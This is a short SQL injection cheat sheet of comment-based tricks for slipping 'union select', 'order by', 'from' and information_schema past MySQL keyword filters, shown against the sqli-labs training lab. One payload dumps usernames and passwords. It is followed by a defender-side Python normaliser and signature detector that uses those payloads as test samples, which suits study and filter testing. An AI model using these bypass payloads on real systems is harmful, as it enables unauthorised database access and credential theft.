I. Bypassing matching of keyword combinations (e.g. union select, order by)
1. /*/s*/
2. /*/a*/%23%0a
Use the sequences above to split the two words, e.g. sqllib_less 1:
id=1' order/*/a*/%23%0aby 3--+
II. Bypassing filters on some key database functions
1. /*!22222database%23%0a*//*/s*/()
Example, sqllib_less 1:
id=-1' union/*/a*/%23%0aselect 1,/*!22222database%23%0a*//*/s*/(),3--+
III. Bypassing the from keyword:
1. /*/s*/%23%0afrom
Example, sqllib_less 1:
id=-1' union/*/a*/%23%0aselect 1,2,group_concat(username,password)/*/s*/%23%0afrom users--+
IV. Bypassing information_schema:
1./*!--+/*%0ainformation_schema./*!tables*/
id=-1' union/*/a*/%23%0aselect 1,2,group_concat(table_name)/*/s*/from /*!--+/*%0ainformation_schema./*!tables*/where table_schema='security'--+
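Added example, not part of the original sheet: a defender-side normaliser in Python that folds the tricks above (block comments, versioned /*!...*/ comments, and the URL-encoded %23%0a, i.e. "#" plus a newline, that closes a line comment) the way MySQL's lexer reads them, then runs plain keyword signatures over the result. The signature names, the sample query strings and the simplifications (no tracking of string literals) are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

def normalize(raw: str) -> str:
    """URL-decode, then fold MySQL comment syntax roughly as the server's lexer does
    (string literals are not tracked: this is a pre-filter for matching, not a parser)."""
    s = unquote_plus(raw)                 # %23 -> '#', %0a -> newline, '+' -> space
    out, i, n = [], 0, len(s)
    while i < n:
        if s.startswith("/*!", i):        # /*!NNNNN body */ : MySQL executes the body
            i += 3
            while i < n and s[i].isdigit():   # skip the optional version number
                i += 1
            out.append(" ")
        elif s.startswith("/*", i):       # ordinary block comment: dropped entirely
            end = s.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif s.startswith("*/", i):       # closer of a versioned comment whose body we kept
            i += 2
            out.append(" ")
        elif s[i] == "#" or (s.startswith("--", i) and (i + 2 >= n or s[i + 2] in " \t\n")):
            end = s.find("\n", i)         # line comment runs to end of line; keep the newline
            i = n if end < 0 else end
            out.append(" ")
        else:
            out.append(s[i])
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip().lower()

# Assumed signature set: plain patterns that only need to match on the normalised text.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "order_by": re.compile(r"\border\s+by\b"),
    "information_schema": re.compile(r"\binformation_schema\s*\."),
    "fingerprint_func": re.compile(r"\b(?:database|version|user)\s*\(\s*\)"),
}

def detect(raw: str) -> list:
    """Names of the signatures that match the normalised query string."""
    s = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(s)]

# Constructed sample query strings: a benign one plus the four payloads from this sheet.
SAMPLES = [
    "id=1",
    "id=1' order/*/a*/%23%0aby 3--+",
    "id=-1' union/*/a*/%23%0aselect 1,/*!22222database%23%0a*//*/s*/(),3--+",
    "id=-1' union/*/a*/%23%0aselect 1,2,group_concat(username,password)/*/s*/%23%0afrom users--+",
    "id=-1' union/*/a*/%23%0aselect 1,2,group_concat(table_name)/*/s*/from /*!--+/*%0ainformation_schema./*!tables*/where table_schema='security'--+",
]
```

Calling detect() on each entry of SAMPLES returns the matching signature names; normalize() shows the folded text the signatures were run against.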